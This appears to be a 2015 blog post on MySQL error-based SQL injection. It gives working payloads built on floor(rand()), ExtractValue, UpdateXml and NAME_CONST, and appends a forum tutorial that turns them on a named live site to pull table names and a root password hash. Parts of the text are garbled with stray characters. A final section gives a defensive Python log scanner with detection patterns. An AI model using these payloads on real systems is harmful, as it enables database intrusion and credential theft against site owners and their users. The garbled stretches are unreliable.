
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The error successfully leaks the MySQL version. To retrieve other data, replace the version() expression with the subquery you want to evaluate.
For example, to retrieve the administrator user name and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: exploiting NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

  R& w$ X! Z7 D% u

4 p' b) o" L+ }4 A6 [' Q/ h
* b* M2 Z& Y$ t- k5 C% `4 B' Y

$ g" o1 L7 A: N0 p5 T0 v
; D0 y8 O/ ~- o( UCode:
5 I0 h, p" J- {, F* b  M( V6 H  Sand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
! C, ?2 N" V8 n

7 }  k  G4 t, R/ @! T# K8 H
: `, F7 D/ `9 M% d1 X2 s0 `# KVAR = Your MySQL variable.
& F* o3 ~( V) X8 l# X+ ~' l& D! j/ o
& {7 @/ T3 ~% M. d2 v2 |MySQL 5.1.3 Server System Variables
3 E- ~( W+ i% I1 z
1 S! W7 j: d/ [0 p( r$ OLet's try it out on my site..
+ d( f# [6 Z( M& q8 F2 M. \9 y: A/ ~; |$ M% A$ B! g! p
Code:) E4 d- |/ Z( b: v9 x0 U3 F- w
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
/ s% w; N  k4 t0 `0 b8 @5 M6 K1 {! B" S2 ]
Erroruplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.) ~4 G7 Z' f. p2 e9 z

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
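As an added example from the defender's side (not part of the original post or the quoted tutorial): a small Python scanner that flags the four error-based primitives shown above (floor(rand()) with GROUP BY, ExtractValue, UpdateXml and NAME_CONST) in web-server access-log request lines, plus a check for whether an HTTP response body echoes the MySQL error text these techniques depend on. The log lines are constructed, and the signatures and Combined Log Format parser are mine, not from any project.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four MySQL error-based primitives covered on this page,
# matched case-insensitively against the URL-decoded request target.
ERROR_BASED_PATTERNS = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# MySQL error fragments (ERROR 1062, ERROR 1105, duplicate column) which, if they
# show up in a response body, mean the application echoes database errors to clients.
LEAKED_ERROR = re.compile(r"Duplicate entry .* for key|XPATH syntax error|Duplicate column name", re.I)

# Combined Log Format: client address, request target and HTTP status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_request(target):
    """Names of the error-based primitives found in a raw (still encoded) request target."""
    decoded = unquote_plus(target)
    return [name for name, pat in ERROR_BASED_PATTERNS.items() if pat.search(decoded)]


def scan_access_log(lines):
    """Report requests carrying a primitive; a 500 next to it hints the DB error really fired."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        primitives = classify_request(m.group(2))
        if primitives:
            hits.append({"client": m.group(1), "status": int(m.group(3)),
                         "path": unquote_plus(m.group(2)).split("?", 1)[0],
                         "primitives": primitives})
    return hits


def leaks_db_error(body):
    """True when an HTTP response body echoes a MySQL error message verbatim."""
    return LEAKED_ERROR.search(body) is not None


# Constructed sample log lines (not taken from the page); the payloads are the ones shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 233',
    '10.0.0.9 - - [11/Nov/2015:19:04:10 +0800] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 188',
    '10.0.0.9 - - [11/Nov/2015:19:04:15 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 201',
]
```

Run `scan_access_log(SAMPLE_LOG)` to get one record per flagged request; `leaks_db_error()` is meant for a response-body check, since the fix on the application side is to stop echoing raw database errors and to use parameterized queries.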